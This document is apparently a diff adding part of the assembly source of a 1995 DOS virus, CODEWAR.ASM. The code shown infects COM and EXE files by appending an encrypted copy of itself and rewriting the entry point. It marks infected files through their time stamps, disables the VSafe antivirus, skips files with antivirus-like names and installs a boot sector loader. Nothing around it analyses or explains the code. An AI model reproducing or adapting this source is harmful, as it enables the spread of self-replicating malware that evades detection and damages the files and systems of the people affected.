+        CMP     Word Ptr ES:[DI+28h],"XE"\r
+        JZ      Is_EXE\r
+\r
+goto_close_exit:\r
+        JMP     Short Close_Exit\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Is_COM:\r
+Is_EXE:\r
+\r
+; Check if infected\r
+        mov     ax,es:[di.SFT_File_Time]\r
+        and     al,00011111b\r
+        cmp     al,Time_Stamp\r
+        jz      Close_Exit\r
+\r
+        PUSH    ES\r
+        PUSH    DI\r
+\r
+; Datum/Zeit sichern\r
+        mov     ax,es:[di.SFT_File_Time]\r
+        mov     cs:[ofs Old_Time -Reloc],ax\r
+        mov     ax,es:[di.SFT_File_Date]\r
+        mov     cs:[ofs Old_Date -Reloc],ax\r
+\r
+; Get file length directly from the SFT and save it\r
+        mov     ax,es:[di+SFT_File_SizeLo]\r
+        mov     cs:[ofs File_SizeLo -Reloc], ax\r
+        mov     ax,es:[di.SFT_File_SizeHi]\r
+        mov     cs:[ofs File_SizeHi -Reloc], ax\r
+\r
+; Force read/write mode\r
+        mov     word ptr es:[di.SFT_Open_Mode],2\r
+\r
+        CALL    Read_Infect\r
+\r
+        POP     DI\r
+        POP     ES\r
+\r
+Close_Exit:\r
+\r
+        MOV     AH,3Eh\r
+        INT     21h\r
+\r
+File_Error:\r
+        XOR     SI,SI\r
+        MOV     DS,SI\r
+\r
+; restore INT 24h\r
+\r
+        POP     AX\r
+        POP     ES\r
+\r
+        MOV     DS:[4*24h],AX\r
+        MOV     DS:[4*24h +2],ES\r
+\r
+\r
+        pop     es ds\r
+        popa\r
+\r
+        JMP     Exit_Int_21\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+goto_Infect_Ret:\r
+        jmp     Infect_Ret\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Process_EXE:\r
+        mov    byte ptr cs:[ofs File_Type -Reloc],File_Type_EXE\r
+\r
+; save handle\r
+        mov     word ptr cs:[ofs Handle -Reloc],bx\r
+\r
+; Dont infect to big/small EXE-files!\r
+        mov     word ptr AX,cs:[ofs File_Buffer.BUF_4h -Reloc]  ; EXE size in 512 byte pages\r
+        cmp     AX,F_Min_LengthEXE                              ; Don't infect files less than xxxx pages\r
+        JB      goto_Infect_Ret\r
+        cmp     AX,F_Max_LengthEXE                              ; Or bigger than xxxx pages\r
+        JA      goto_Infect_Ret\r
+\r
+; save handle\r
+        push    bx\r
+\r
+; seek to EOF\r
+\r
+        CALL    Seek_EOF\r
+\r
+\r
+; It's OK!  Process it now !\r
+        les     ax,dword ptr cs:[File_Buffer.Buf_14h -Reloc]    ;Entry_Point_Disp\r
+        mov     cs:[ofs Old_IP -Reloc],ax\r
+        mov     cs:[ofs Old_CS -Reloc],es\r
+\r
+        les     ax,dword ptr cs:[File_Buffer.Buf_eh -Reloc]     ;Stack_Disp\r
+        mov     cs:[ofs Old_SS -Reloc],ax\r
+        mov     cs:[ofs Old_SP -Reloc],es\r
+\r
+        mov     ax,cs:[ofs File_Buffer.Buf_8h -Reloc]  ; = Header size in paras\r
+        mov     cl,4\r
+        shl     ax,cl                                    ; Convert to byte-format\r
+\r
+; Get file size from SFT\r
+        push    ax                                       ; Save header size\r
+        mov     ax,cs:[ofs File_SizeLo -Reloc]\r
+        mov     dx,cs:[ofs File_SizeHi -Reloc]\r
+\r
+; add the padding-number\r
+        mov     cx,cs:[ofs File_SizeLo -Reloc]\r
+        MOV     CH,CL\r
+        MOV     CL,16\r
+        SUB     CL,CH\r
+        AND     CX,1+2+4+8\r
+        add     ax,cx\r
+\r
+; save the padding-number\r
+        mov     cs:[ofs Padded -reloc],cx\r
+\r
+        pop     bx                                       ; = Header size\r
+\r
+        sub     ax,bx                   ; DX:AX := file size - header size\r
+        sbb     dx,0\r
+\r
+        mov     cx,16                   ; Convert to seg:ofs format\r
+\r
+        div     cx                      ; DX:AX := (DX:AX) / 10h\r
+\r
+        or      dx,dx                   ; IP\r
+        jz      was_rounded\r
+\r
+        xor     dx,dx\r
+        mov     cs:[ofs File_Buffer.Buf_14h -Reloc],dx              ; New IP\r
+        mov     cs:[ofs File_Buffer.Buf_16h -Reloc],ax              ; New CS\r
+\r
+        inc     word ptr cs:[ofs File_Buffer.Buf_16h -Reloc]                 ; CS\r
+        jmp     rounded\r
+\r
+was_rounded:\r
+        mov     cs:[ofs File_Buffer.Buf_14h -Reloc],dx              ; New IP\r
+        mov     cs:[ofs File_Buffer.Buf_16h -Reloc],ax              ; New CS\r
+\r
+rounded:\r
+        inc     ax                                                  ; Avoid the "K" TB-flag (seems unecessary)\r
+        mov     word ptr cs:[ofs File_Buffer.Buf_eh -Reloc],ax      ; New SS\r
+        mov     word ptr cs:[ofs File_Buffer.Buf_10h -Reloc],0      ; New SP\r
+\r
+        mov     ax,cs:[ofs File_SizeLo -Reloc]\r
+        mov     dx,cs:[ofs File_SizeHi -Reloc]\r
+\r
+; add the padding-number\r
+        add     ax,cs:[ofs Padded -reloc]\r
+        add     dx,0\r
+\r
+\r
+        add     ax,Virus_Length         ; Lo-word\r
+        adc     dx,0                    ; Hi-word\r
+\r
+        push    ax                      ; Lo-word\r
+        shr     ax,9                    ;\r
+        ror     dx,9\r
+        stc\r
+        adc     dx,ax\r
+        pop     ax\r
+\r
+        and     ah,1                                           ; Mod 512\r
+        mov     cs:[ofs File_Buffer.Buf_4h -Reloc],dx               ; Size in pages (rounded up)\r
+        mov     cs:[ofs File_Buffer.Buf_2h -Reloc],ax               ; Size of last page (in bytes)\r
+\r
+        push    cs cs\r
+        pop     ds es\r
+\r
+\r
+        mov     word ptr bx,cs:[ofs Handle -Reloc]\r
+        mov     ax,cs:[ofs File_SizeLo -Reloc]\r
+\r
+        CALL    Padding\r
+\r
+; Construct index for decryptor\r
+\r
+        PUSH    AX\r
+\r
+        MOV     word ptr DS:[ofs E1_Idx_Val -Reloc],(ofs E1_Encrypted_Code-ofs Vir_start)-Camouf\r
+        MOV     word ptr DS:[ofs E2_Idx_Val -Reloc],(ofs E2_Encrypted_Code-ofs Vir_start)\r
+        MOV     word ptr DS:[ofs E3_Idx_Val -Reloc],(ofs E3_Encrypted_Code-ofs Vir_start)\r
+\r
+        POP     AX\r
+\r
+        pop     bx\r
+        jmp     Attach\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Read_Infect:\r
+\r
+        CALL    Seek_TOF\r
+\r
+; read xx bytes\r
+\r
+        MOV     AH,3Fh\r
+        MOV     CX,Header_Length\r
+        MOV     DX,ofs File_buffer -Reloc\r
+        INT     21h\r
+        jnb     read_ok\r
+        jmp     Infect_Ret\r
+\r
+read_ok:\r
+        cmp     word ptr cs:[ofs File_buffer -Reloc],"ZM"\r
+        jnz     Process_COM\r
+        jmp     Process_EXE\r
+\r
+;----------------------------------------------------------------------------\r
+Process_COM:\r
+\r
+        mov    byte ptr cs:[ofs File_Type -Reloc],File_Type_COM\r
+\r
+\r
+; seek to EOF\r
+\r
+        CALL    Seek_EOF\r
+\r
+; Save 3 bytes\r
+\r
+        MOV     ax,word ptr DS:[File_buffer -Reloc]\r
+        MOV     DS:[ofs Rest1 -Reloc],ax\r
+        MOV     al,byte ptr DS:[File_buffer -Reloc +2]\r
+        MOV     DS:[ofs Rest2 -Reloc],al\r
+\r
+        CALL    Seek_EOF\r
+\r
+; file smaller than xxxx bytes ?\r
+\r
+        CMP     AX,F_Min_LengthCOM\r
+        JB      Infect_Ret\r
+\r
+; file larger than xxxx bytes ?\r
+\r
+        CMP     AX,F_Max_LengthCOM\r
+        JA      Infect_Ret\r
+\r
+\r
+        CALL    Padding\r
+\r
+\r
+; Construct index for decryptor\r
+\r
+        PUSH    AX\r
+\r
+; layer 1\r
+        ADD     AX,100h+ (ofs E1_Encrypted_Code-ofs Vir_Start)-Camouf\r
+        MOV     DS:[ofs E1_Idx_Val -Reloc],AX\r
+\r
+; layer 2\r
+        pop     ax\r
+        push    ax\r
+\r
+        ADD     AX,100h+ (ofs E2_Encrypted_Code-ofs Vir_Start)\r
+        MOV     DS:[ofs E2_Idx_Val -Reloc],AX\r
+\r
+; layer 3\r
+        pop     ax\r
+        push    ax\r
+\r
+        ADD     AX,100h+ (ofs E3_Encrypted_Code-ofs Vir_Start)\r
+        MOV     DS:[ofs E3_Idx_Val -Reloc],AX\r
+\r
+\r
+        POP     AX\r
+\r
+; construct and insert a JUMP-INSTR.\r
+\r
+        MOV     byte ptr DS:[File_buffer -Reloc],0E9h\r
+        SUB     AX,3\r
+        MOV     word ptr DS:[File_buffer+1 -Reloc],AX\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Attach:\r
+\r
+; write body at EOF\r
+\r
+        MOV     AH,40h\r
+        MOV     CX,Virus_Length\r
+        MOV     DX,ofs Buffer -Reloc\r
+        CALL    Encrypt_Virus\r
+        INT     21h\r
+        JB      Infect_Ret\r
+\r
+; write JUMP to TOF\r
+\r
+        MOV     AL,0\r
+        CALL    Seek_TOF\r
+\r
+        MOV     AH,40h\r
+        MOV     CX,Header_Length\r
+        MOV     DX,ofs File_buffer -Reloc\r
+        INT     21h\r
+\r
+; restore time stamps\r
+\r
+        mov     AX,5701h\r
+        mov     cx,cs:[ofs Old_Time -Reloc]\r
+        mov     dx,cs:[ofs Old_Date -Reloc]\r
+        and     cl,11100000b\r
+        or      cl,Time_Stamp                      ; Mark with Time-ID\r
+        INT     21h\r
+\r
+Infect_Ret:\r
+        RET\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Padding:\r
+        MOV     AH,AL\r
+        MOV     AL,16\r
+        SUB     AL,AH\r
+        AND     AX,1+2+4+8\r
+        MOV     DX,AX\r
+\r
+; seek forward\r
+        MOV     AL,01h\r
+        call    Seek_File\r
+        ret\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Deinstall_Vsafe:\r
+        pusha\r
+        push    ds es\r
+\r
+        MOV     DX,5945h\r
+        MOV     AX,0FA01h\r
+        INT     16h\r
+\r
+        pop     es ds\r
+        popa\r
+        ret\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Check_If_AV_Name proc near\r
+        cmp     byte ptr es:[di.SFT_File_Name],"L"\r
+        jz      Found_AV_Name\r
+        cmp     byte ptr es:[di.SFT_File_Name],"-"\r
+        jz      Found_AV_Name\r
+        cmp     word ptr es:[di.SFT_File_Name],"BT"\r
+        jz      Found_AV_Name\r
+        cmp     word ptr es:[di.SFT_File_Name],"CS"\r
+        jz      Found_AV_Name\r
+        cmp     word ptr es:[di.SFT_File_Name],"-F"\r
+        jz      Found_AV_Name\r
+        cmp     word ptr es:[di.SFT_File_Name],"IV"\r
+        jz      Found_AV_Name\r
+Found_AV_Name:\r
+        ret\r
+Check_If_AV_Name endp\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Seek_EOF:\r
+        MOV     AL,02h\r
+Seek_TOF:\r
+        XOR     DX,DX\r
+Seek_File:\r
+        MOV     AH,42h\r
+        XOR     CX,CX\r
+        INT     21h\r
+        RET\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Call_Old_Int21 PROC NEAR\r
+        pushf\r
+        call    dword ptr cs:(ofs Old_Int_21 -Reloc)\r
+        ret\r
+Call_Old_Int21 ENDP\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Call_Old_Int2F PROC NEAR\r
+        pushf\r
+        call    dword ptr cs:(ofs Old_Int_2F -Reloc)\r
+        ret\r
+Call_Old_Int2F ENDP\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+New_Int_24:\r
+        MOV     AL,03h\r
+        IRET\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Old_Int_13      dd      0\r
+Old_Int_1C      dd      0\r
+Old_Int_21      dd      0\r
+\r
+Old_Int_2f      dd      0\r
+\r
+Old_Time        dw      0\r
+Old_Date        dw      0\r
+\r
+Handle          dw      0\r
+\r
+; If Int 21h allready captured then 1 else 0\r
+Got_Int_21      db      0\r
+\r
+File_SizeHi     dw      0\r
+File_SizeLo     dw      0\r
+\r
+Padded          dw      0\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+BS_first_word   dw      0\r
+Old_BS_code     db      32 dup ('B')\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; The first word of the PAR/BS is stored here\r
+\r
+JBS_first_word:\r
+        jmp     $ + 60h\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Start_JBoot:\r
+        XOR     DI,DI\r
+        MOV     SI,7C00h\r
+\r
+        CLI\r
+        MOV     SP,SI\r
+        MOV     SS,DI\r
+        STI\r
+\r
+; read xx sectors to 7e00h\r
+\r
+        MOV     ES,DI\r
+        MOV     AX,0204h                        ; !!!!!!  Sectors !!!!!!\r
+        MOV     BX,7c00h+512\r
+\r
+        MOV     CX,1234h\r
+        ORG     $-2\r
+Ptc_CX  dw      0004h\r
+\r
+        MOV     DX,1234h\r
+        ORG     $-2\r
+Ptc_DX  dw      0080h\r
+\r
+        nop\r
+        nop\r
+\r
+        INT     13h\r
+\r
+; Jump to the reload code from 2 sectors\r
+; The offset in the BS/PAR where this instuction is executed is at\r
+; BS/PAR:60h+($-Start_Jboot)\r
+\r
+        jmp     $ + 512 - ($-Start_Jboot+60h)       ;+512 -125\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+        db      " [[  Cú0úDúEúWúAúR  ]]  <32>  Germany  1995  "\r
+        db      "Virtually called to life & survival by"\r
+\r
+        db      "RGOEPMSQO & NJOENBOJBD"\r
+\r
+        db      " ==>= AllE GUtEN DiNGE SiND DREi  ==>=  "\r
+\r
+        db      0\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+Encrypted_Code_End      equ     $\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+File_buffer:\r
+        db      Header_Length dup ('H')\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; here is the virus copied and encrypted\r
+Buffer  equ     $\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+\r
+\r
+\r
+\r
+\r
+CODE    ENDS\r
+        END     Sample\r
+\r
+\r
+; CODEWAR.ASM\r
+\1a
\ No newline at end of file
Unnamed repository; edit this file 'description' to name the repository.